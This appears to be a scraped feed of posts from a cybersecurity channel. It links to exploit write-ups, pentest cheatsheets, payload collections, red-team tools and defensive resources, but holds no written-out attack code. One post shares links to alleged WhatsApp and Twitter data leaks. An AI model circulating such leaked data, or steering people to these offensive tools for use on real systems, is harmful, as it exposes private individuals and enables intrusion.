SGX.Fail - Overview of SGX Attackshttps://sgx.fail/Submitted November 30, 2022 at 07:59AM by Gallusvia reddit https://ift.tt/fptIBWk
2022-11-30 06:29:29
☃️Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet☃️➡️ Wireless Testing➡️ Networking➡️ Mobile App Testinghttps://github.com/OlivierLaflamme/Cheatsheet-Godand much more...#oscp #bugbounty #activedirectory #redteaming #infosec #hacking #cybersecurity
2022-11-30 01:57:03
Xiongmai IoT Exploitationhttps://ift.tt/3txnMOVSubmitted November 30, 2022 at 01:50AM by chicksdigthelongrunvia reddit https://ift.tt/E3C5Mpb
2022-11-29 17:03:04
Are you looking for OSINT books? In the overview below you will find various books about Open Source Intelligence (OSINT), Social Media Intelligence (SOCMINT), Privacy, Hacking, Red Teaming, Blue Teaming, Brand Protection, Automation and more! ▫️ https://www.aware-online.com/en/osint-books/Cyber security post uploader admin @hayper007
2022-11-29 15:20:57
​​BugBountyTips#BugBounty (Bypasses, Payloads, y más)https://github.com/xNaughty/BugBountyTips
2022-11-29 12:00:18
​​otpOne Time Password utilities Go / GolangOne Time Passwords (OTPs) are an mechanism to improve security over passwords alone. When a Time-based OTP (TOTP) is stored on a user's phone, and combined with something the user knows (Password), you have an easy on-ramp to Multi-factor authentication without adding a dependency on a SMS provider. This Password and TOTP combination is used by many popular websites including Google, GitHub, Facebook, Salesforce and many others.The otp library enables you to easily add TOTPs to your own application, increasing your user's security against mass-password breaches and malware.https://github.com/pquerna/otp
2022-11-29 12:00:17
#mobile #dfir
2022-11-29 04:03:56
https://www.mediafire.com/folder/08fvlaxmz4t5d/Whatsapp+SampleWhatsApp leakhttps://drive.google.com/drive/u/0/mobile/folders/1ym9VORbxCu8Sl5fmBkC1HZyUhU0NrH-aTwitter leak igsample #hacker_bano_chutiya_nhe 👻👻
2022-11-28 17:37:00
PLEASE USE THIS WEBSITE WHEN YOU WANT SOME IP INFORMATION https://Criminalip.io@alex14324
2022-11-28 16:03:23
https://youtu.be/pE_jI_1soy8
2022-11-28 13:41:43
🔥Mind the Gap The week before FirstCon22, Maddie gave an internal preview of her talk("0-day In-the-Wild Exploitation in 2022…so far"). Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).⚠️The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
2022-11-28 13:39:38
#Research"Investigating co-occurrences of MITRE ATT\&CK Techniques", 2022.
2022-11-28 13:39:37
#Infosec_StandardsNIST SP 800-215: "Guide to a Secure Enterprise Network Landscape", August 5, 2022.
2022-11-28 13:39:34
#DFIR#Blue_Team_TechniquesLinux Forensicshttps://github.com/ashemery/LinuxForensics
2022-11-28 13:39:33
#IoT_Security1. Vulnerabilities in BMC Firmware Affect OT/IoT Device Securityhttps://www.nozominetworks.com/blog/vulnerabilities-in-bmc-firmware-affect-ot-iot-device-security-part-12. IoT Security Administrator’s Guidehttps://docs.paloaltonetworks.com/iot/iot-security-admin
2022-11-28 13:39:32
#Cloud_SecurityA Azure Exploitation Toolkit for Red Team & Pentestershttps://github.com/SikretaLabs/BlueMap
2022-11-28 13:39:31
#tools#Offensive_security1. A terminal-based editor for PowerShellhttps://github.com/ironmansoftware/psedit2. Cobalt Strike Community Kit - central repository of extensions written by the user community to extend the capabilities of Cobalt Strikehttps://github.com/Cobalt-Strike/community_kit
2022-11-28 11:38:23
Containers: Rootful, Rootless, Privileged and Super Privileged.https://infosecadalid.com/2021/08/30/containers-rootful-rootless-privileged-and-super-privileged/
2022-11-27 14:19:28
📌Manual SQL Injection Cheatsheet#bugbounty #infosec
2022-11-27 12:53:32
https://youtu.be/0w8C5mv3nVA
2022-11-27 12:02:06
💥NETGEAR R7800 AFPD PreAuth + PoC exploitA heap-buffer overflow in afpdʼs dsi_writeinit is leveraged to overwrite the proto_close function pointer in the DSI struct, and execute arbitrary code on the NETGEAR R7800 Smart Router, in the default configuration, on the LAN side, pre-auth.
2022-11-27 12:01:55
🔥Vulnerabilities in BMC Firmware Affect OT/IoT Device Security(part1)By abusing these vulnerabilities, an unauthenticated attacker may achieve RCE with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement.
2022-11-27 12:01:40
💥Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor NoticeNighthawk is a mature and advanced commercial C2 framework for lawful red team operations that is specifically built for detection evasion, and it does this well. While Proofpoint researchers are not aware of adoption of Nighthawk in the wild by attributed threat actors, it would be incorrect and dangerous to assume that this tool will never be appropriated by threat actors with a variety of intexfnts and purposes.🔥🔥🔥PoC of the removed registered LdrDllNotification for your enjoyment. 🔥🔥🔥PoC for utilizing RtlQueueWorkItem to load libraries
2022-11-26 17:01:32
https://youtu.be/Uojl9n1qGKc
2022-11-26 14:13:51
#Research"Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks", 2022.]-> https://zenodo.org/record/5874851#.Y4Gx7aSOFSA
2022-11-26 14:13:50
#Red_Team_Tactics1. Header spoofing via a hidden parameter in Facebook Batch GraphQL APIshttps://feed.bugs.xdavidhu.me/bugs/00172. UAC Bypass On Windows Defender For Endpoint With HighBornhttps://assume-breach.medium.com/home-grown-red-team-uac-bypass-on-windows-defender-for-endpoint-with-highborn-e9ea16546029
2022-11-26 14:13:49
#Research"SARA: Secure Android Remote Authorization", 2022.]-> Repo: https://github.com/purseclab/SARA-Secure-Android-Remote-Authorization